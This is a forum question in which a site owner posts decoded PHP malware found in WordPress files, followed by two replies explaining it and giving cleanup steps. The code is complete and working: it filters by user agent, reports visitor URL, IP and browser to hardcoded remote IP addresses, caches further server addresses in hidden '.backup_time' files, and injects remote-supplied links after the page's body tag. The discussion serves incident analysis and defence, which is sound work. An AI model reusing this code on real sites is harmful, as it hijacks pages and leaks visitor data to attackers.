What does this malicious PHP code found in a WordPress install do?

I was able to decode the following PHP script which I found within some WordPress files. Just out of curiosity, can someone tell me what this code actually does? It looks like it has been somehow replicated to other WordPress installs on the same server.

<?php 

error_reporting(0);

if (!function_exists("ZM5j2q0shf_pirogok")){
function ZM5j2q0shf_pirogok(){
return false;
}

if (!function_exists("Uno_decode")){
function Uno_decode($String)
{
    $String = base64_decode($String);
    $Salt="dc5p9dOpBc";
    $StrLen = strlen($String);
    $Seq = "DMEf5HZuPq";
    $Gamma = "";
    while (strlen($Gamma)<$StrLen)
    {
        $Seq = pack("H*",sha1($Gamma.$Seq.$Salt));
        $Gamma.=substr($Seq,0,8);
    }

    return $String^$Gamma;
}
}

if (!function_exists("get_t_dir_mass")){
function get_t_dir_mass() {

if (function_exists("sys_get_temp_dir")) {
    if (@is_writeable(sys_get_temp_dir())) { $res[] = realpath(sys_get_temp_dir()); }
}
    if (!empty($_ENV["TMP"]) && @is_writeable(realpath($_ENV["TMP"]))) { $res[] = realpath($_ENV["TMP"]); }
    if (!empty($_ENV["TMPDIR"]) && @is_writeable(realpath($_ENV["TMPDIR"]))) { $res[] = realpath( $_ENV["TMPDIR"]); }
    if (!empty($_ENV["TEMP"]) && @is_writeable(realpath($_ENV["TEMP"]))) { $res[] = realpath( $_ENV["TEMP"]); }
    $tempfile=@tempnam(__FILE__,"");
    if (@file_exists($tempfile)) {
      @unlink($tempfile);
    if (@is_writeable(realpath(dirname($tempfile)))) {$res[] = realpath(dirname($tempfile)); }

    }
    if (@is_writeable(realpath(@ini_get("upload_tmp_dir")))) { $res[] = realpath(@ini_get("upload_tmp_dir")); }
    if (@is_writeable(realpath(session_save_path()))) {$res[] = realpath(session_save_path()); }
    if (@is_writeable(realpath(dirname(__FILE__)))) { $res[] = realpath(dirname(__FILE__)); }

    return array_unique($res);
}
}

if (!function_exists("get_ua")){
function get_ua(){
$name = get_true_name();

foreach(get_t_dir_mass() as $t){
if(file_exists($t.DIRECTORY_SEPARATOR.$name)){
foreach (file($t.DIRECTORY_SEPARATOR.$name) as $tt){
$tt = Uno_decode($tt);
if(strpos($tt,".") === false){
$tmp = explode("|",$tt);
foreach($tmp as $u){
$know[] = trim($u);
}
}
}
}
}
if(count($know) == 0){
$know[] = "msie";
$know[] = "firefox";
$know[] = "googlebot";
}
return array_unique($know);
}
}

if (!function_exists("get_true_name")){
function get_true_name(){
return ".backup_time";
}
}

if (!function_exists("strposa")){
function strposa($haystack, $needle, $offset=0) {
    if(!is_array($needle)) $needle = array($needle);
    foreach($needle as $query) {
        if(strpos($haystack, $query, $offset) !== false) return true;
    }
    return false;
}
}

if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);

$true_ua = get_ua();

if (strposa($ua,$true_ua)){

if (!function_exists("t_dir")){
function t_dir() {
if (function_exists("sys_get_temp_dir")) {
    if (@is_writeable(sys_get_temp_dir())) { return realpath(sys_get_temp_dir()); }
}
    if (!empty($_ENV["TMP"]) && @is_writeable(realpath($_ENV["TMP"]))) { return realpath($_ENV["TMP"]); }
    if (!empty($_ENV["TMPDIR"]) && @is_writeable(realpath($_ENV["TMPDIR"]))) { return realpath( $_ENV["TMPDIR"]); }
    if (!empty($_ENV["TEMP"]) && @is_writeable(realpath($_ENV["TEMP"]))) { return realpath( $_ENV["TEMP"]); }
    $tempfile=@tempnam(__FILE__,"");
    if (@file_exists($tempfile)) {
      @unlink($tempfile);
    if (@is_writeable(realpath(dirname($tempfile)))) {return realpath(dirname($tempfile)); }

    }
    if (@is_writeable(realpath(@ini_get("upload_tmp_dir")))) { return realpath(@ini_get("upload_tmp_dir")); }
    if (@is_writeable(realpath(session_save_path()))) { return realpath(session_save_path()); }
    if (@is_writeable(realpath(dirname(__FILE__)))) { return realpath(dirname(__FILE__)); }
    return null;
}
}

if (!function_exists("get_know_ip")){
function get_know_ip(){
$know[] = "151.236.14.86";
$know[] = "149.154.157.133";
$know[] = "37.235.54.48";
$know[] = "31.215.205.196";

$name = get_true_name();

foreach(get_t_dir_mass() as $t){
if(file_exists($t.DIRECTORY_SEPARATOR.$name)){
foreach (file($t.DIRECTORY_SEPARATOR.$name) as $tt){
$tt = Uno_decode($tt);
if(strpos($tt,".")>0){
$know[] = trim($tt);
}
}
}
}
return array_unique($know);
}
}

if (!function_exists("save_know_ip")){
function save_know_ip($ip){
$name = get_true_name();
$content =  implode(PHP_EOL, $ip);
foreach(get_t_dir_mass() as $t){
$f = fopen($t.DIRECTORY_SEPARATOR.$name,"w");
fputs($f,$content);
fclose($f);
}
}
}

if (!function_exists("ZM5j2q0shf_get_real_ip")){
function ZM5j2q0shf_get_real_ip() {
$proxy_headers = array("CLIENT_IP","FORWARDED","FORWARDED_FOR","FORWARDED_FOR_IP","HTTP_CLIENT_IP","HTTP_FORWARDED","HTTP_FORWARDED_FOR","HTTP_FORWARDED_FOR_IP", "HTTP_PC_REMOTE_ADDR","HTTP_PROXY_CONNECTION","HTTP_VIA", "HTTP_X_FORWARDED", "HTTP_X_FORWARDED_FOR", "HTTP_X_FORWARDED_FOR_IP","HTTP_X_IMFORWARDS","HTTP_XROXY_CONNECTION","VIA", "X_FORWARDED", "X_FORWARDED_FOR");
foreach($proxy_headers as $proxy_header)
{
if(isset($_SERVER[$proxy_header]) && preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $_SERVER[$proxy_header])){return $_SERVER[$proxy_header];}
else if(stristr(",", $_SERVER[$proxy_header]) !== FALSE)
{$proxy_header_temp = trim(array_shift(explode(",", $_SERVER[$proxy_header]))); 
if(($pos_temp = stripos($proxy_header_temp, ":")) !== FALSE) $proxy_header_temp = substr($proxy_header_temp, 0, $pos_temp); 
if(preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $proxy_header_temp) )return $proxy_header_temp;
}
}
return $_SERVER["REMOTE_ADDR"];
}
}

if (!function_exists("ZM5j2q0shf_get_url")){
function ZM5j2q0shf_get_url(){ 
$url = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
if (strpos($url,"?") !== false){
$url = substr($url,0,strpos($url,"?"));
}
return $url;
}
}


if (!function_exists("ZM5j2q0shf_get_contents")){
function ZM5j2q0shf_get_contents($ip, $page){
if((function_exists("curl_init")) && (function_exists("curl_exec"))){
    $ch = curl_init("http://" .$ip . "/" .$page);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 3);
    $ult = trim(curl_exec($ch));
    return $ult;
    }

if (ini_get("allow_url_fopen")) {
    $ult = trim(@file_get_contents("http://" .$ip . "/" .$page));
    return $ult;
    }
    $fp = fsockopen($ip, 80, $errno, $errstr, 30);
    if ($fp) {$out = "GET $page HTTP/1.0rn";
    $out .= "Host: $iprn";
    $out .= "Connection: Closernrn";
    fwrite($fp, $out);
    $ret = "";
    while (!feof($fp)) {$ret  .=  fgets($fp, 128);}
fclose($fp);
$ult = trim(substr($ret, strpos($ret, "rnrn") + 4));}
return $ult;
}
}

if (!function_exists("ZM5j2q0shf_samui_get_links")){
function ZM5j2q0shf_samui_get_links(){

$all = get_know_ip();
shuffle($all);
$url = ZM5j2q0shf_get_url();
$real_ip = ZM5j2q0shf_get_real_ip();
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
$aid = "1001";
$cod = md5($url.time());
$check = md5($cod);
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
$ref = urlencode(strtolower($_SERVER["HTTP_REFERER"]));
$page = "/ml.php?mother=mycompany.com&cr=1&aid=".$aid."&url=".$url."&ip=".$real_ip."&ua=".$ua."&cod=".$cod."&ref=".$ref;

foreach ($all as $ip){
$tc = ZM5j2q0shf_get_contents(trim($ip),$page);
$pos = strpos($tc, $check);
if ($pos !== false){
$proxy_list = substr($tc,0,$pos);

save_know_ip(explode("n",$proxy_list));


$links = substr($tc,$pos+32);
return $links;
}
}
}
}

if (!function_exists("ZM5j2q0shf_mod_con")){
function ZM5j2q0shf_mod_con($con){
if (strpos($con,"<body") !== false) {
$text = preg_replace("/<body(s[^>]*)?>/i", "<body1>".ZM5j2q0shf_samui_get_links(), $con,1);  
return $text;
} else {return $con;}
}
}


if (!function_exists("ZM5j2q0shf_callback")){
function ZM5j2q0shf_callback($buf){
if (headers_sent()){
if (in_array("Content-Encoding: gzip", headers_list())){
$tmpfname = tempnam(t_dir(), "FOO");$zf = fopen($tmpfname, "w"); fputs($zf, $buf); fclose($zf); $zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = ZM5j2q0shf_mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);} else {$contents = ZM5j2q0shf_mod_con($buf); }} else {$contents = ZM5j2q0shf_mod_con($buf);}return($contents);
}
}

ob_start("ZM5j2q0shf_callback");

}
}
}

?>

Related posts

Leave a Reply

2 comments

  1. Its going to a known parent ip’s to download a zipped payload and store it to one of your temp directories. Its then injecting html depending on payload into the top of your html page just bellow <body>. It also checks for new ip’s that can be used to download more bad guy code to inject.

  2. In case you found a .backup_time file on the root and your site slows down the you ve been hacked and your site redirects mobile users to download malicious apps.

    Since I ve been there and done that I explain.

    Identifying issue
    – Slow Response time ( TFB very big, could be a minute)
    – A second body (!) tag when inspecting the page
    – False Re directions for mobile users
    – If on WP site then the admin would have also been slightly changed

    Quick and Relatively Good Recovery

    • Detect which .php files have been recently updated and became larger in size. Check the first line (literally scroll to the very right of the first line) of index.php and even config.php for an unusual long string thats not there by you. Remove it from everywhere on the root and sub-folders ( yes it might have migrated deeper or in cases even higher in the folder hierarchy)

    • In case you did the previous message but still the weird file returns after refreshing repeat previous step more carefully and thoroughly. You probably missed some file that it appeared.

    • To best assure you are over with change ftp passwords cause you might be the initial hack vulnerability

    I had my server infected probably through a WP plugin or smt but the infection traveled upwards and downwards in the folder hierarchy even in sites that were not WP, but simple php.

    hope it helped